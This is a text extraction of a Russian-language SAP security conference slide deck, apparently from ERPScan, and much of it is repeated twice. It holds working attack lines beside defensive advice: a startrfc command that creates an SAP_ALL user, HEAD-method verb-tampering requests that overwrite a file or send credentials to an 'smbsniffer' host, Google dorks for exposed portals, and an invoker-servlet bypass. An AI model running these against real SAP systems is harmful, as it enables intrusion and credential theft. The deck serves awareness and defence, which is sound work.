- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
